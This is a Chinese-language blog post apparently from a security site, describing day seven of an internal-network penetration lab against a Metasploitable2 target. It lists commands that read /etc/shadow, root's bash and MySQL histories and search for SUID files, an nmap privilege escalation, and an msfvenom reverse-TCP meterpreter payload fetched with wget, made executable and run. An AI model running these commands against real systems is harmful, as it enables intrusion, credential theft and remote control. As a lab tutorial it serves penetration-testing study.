freeBuf
主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

内网渗透 day7-linux信息收集
2020-11-16 14:20:05

linux信息搜集

1. linux信息搜集

id 查看当前用户的权限和所在的管理组

wps21[1]

python -c "import pty;pty.spawn('/bin/bash');" 会话提升

wps22[1]

uname -a 查看linux版本内核信息

wps23[1]

cat /etc/*release 查看linux发行信息

wps24[1]

dpkg -l 查看安装的包

wps25[1]

crontab -l 是否有计划任务(这边显示没有计划任务)

wps26[1]

/sbin/ifconfig -a 查看ip地址等

wps27[1]

cat /etc/passwd 普通用户可以查看用户的信息

wps28[1]

cat /etc/shadow 账号密码信息(root权限)(这边显示没有权限)

wps29[1]

wps30[1]

cat /root/.mysql_history 查看mysql历史操作(靶机和kali都未对mysql进行过操作所以没有这个文件)

wps31[1]

cat /root/.bash_history 查看用户指令历史记录

wps32[1]

cat /proc/version   查看内核信息

wps33[1]

find / -perm -u=s -type f 2>/dev/null        匹配高权限的文件,看是否有利用点

/:代表查询位置,当前设置为根目录

-perm:代表权限

-u=s:代表用户的权限 s:superbin

-type:类型 ,f代表文件 file

2. nmap漏洞复现

wps34[1]

nmap --interactive    -->!sh           利用nmap3.5<4.6.4之间存在的漏洞进行提权


3. msf linux模块反弹shell

先在kali上生成木马

wps35[1]

msfvenom -a x86 --platform linux -p linux/x86/meterpreter/reverse_tcp lhost=192.168.227.129 lport=4444 -f elf -o xx.elf                           linux的x86 payload需要跟上x86


首先先然metasploit2下载kali上的木马文件

wps36[1]

wget http://1192.168.227.129:80/xx.elflinux从命令行下载网页文件


然后将文件赋予能执行的权利(这里为了方便直接给了4777)

wps37[1]

chmod 4777 xx.elf                     修改文件权限


因为是linux系统所以在设置监听的payload的时候需要也是linux

wps38[1]

linux执行xx.elf文件

wps39[1]

成功进入到meterpreter界面

wps40[1]

wps41[1]

# 内网渗透 # linux安全
本文为 独立观点,未经允许不得转载,授权请联系FreeBuf客服小蜜蜂,微信:freebee2022
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
相关推荐
  • 0 文章数
  • 0 关注者